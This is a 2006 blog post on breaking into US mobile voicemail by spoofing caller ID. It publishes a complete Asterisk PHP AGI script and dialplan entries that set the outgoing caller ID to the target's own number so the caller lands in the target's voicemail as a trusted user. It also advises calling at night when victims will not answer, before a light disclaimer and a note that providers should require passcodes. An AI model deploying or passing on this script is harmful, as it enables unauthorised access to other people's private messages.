Hacking mobile voicemail with Asterisk and caller ID spoofing
Posted on Sep 25, 2006
So there has always had a problem with US mobile providers having their voicemail be susceptible to being compromised by calling with a spoofed caller id. Apparently most providers caller id apps just checks the referring callerid - and doesn’t force the voicemail user to pick a passcode; so it allows someone to trick the voicemail app into believing they are calling from a trusted number.
This has been covered all over the Internet and was in the spotlight awhile back when it was alleged that this was how Paris Hilton’s mobile phone was hacked. It is a pretty big problem and is probably really easy to fix.
So, just to make things funnier - I decided that I would release a snippit of code that would make it easier to execute this hack.
#!/asterisk/php/bin/php -q <? set_time_limit(30); //make sure the php script doesn't time out require('phpagi.php'); // include the phpagi class error_reporting(E_ALL); // limit the errors $agi = new AGI(); // instantiate the AGI class $agi->answer(); // answer the phone sleep(2); // wait a sec or two $agi->stream_file('enter_spoof'); // speak a wav file that says "enter the number" $result = $agi->get_data('beep', 3000, 10); // beep and grab the 10 numbers $agi->verbose("Number to call:".$result['result']); // throw info so you know whats up $agi->set_callerid($result['result']); // set caller id to the number you are calling $agi->exec("Dial IAX2/iax-provider/1".$result['result']); // call the number ?>
You can add this to your /var/lib/asterisk/agi-bin dir and then specify the extension you want to use to dial and execute the php/agi script
exten => 666,1,Answer exten => 666,2,AGI(tmobilevoicemail_spoof.php) exten => 666,3,Hangup
Then when you dial 666 it executes the script. It will ask you what number to dial then dial it after setting the caller id to the same number. It will dial the number and then ring the phone. If the phone is on and the target number is answered - it won’t work; however if the person doesn’t answer you will be placed in the targets voicemail as a trusted user. So, I would suggest calling people in the middle of the night or when you know they will not answer. Wait.. I actually wouldn’t suggest calling anyone but yourself.
It seems to me that the only viable solution that will be compatible with all phones, people and providers is to force the users to choose passcode to your voicemail.
This is - of course - a proof of concept. You should not actually hack peoples voicemails. That is not very nice. We are into being nice.
Also, check out my previous entry on caller id spoofing.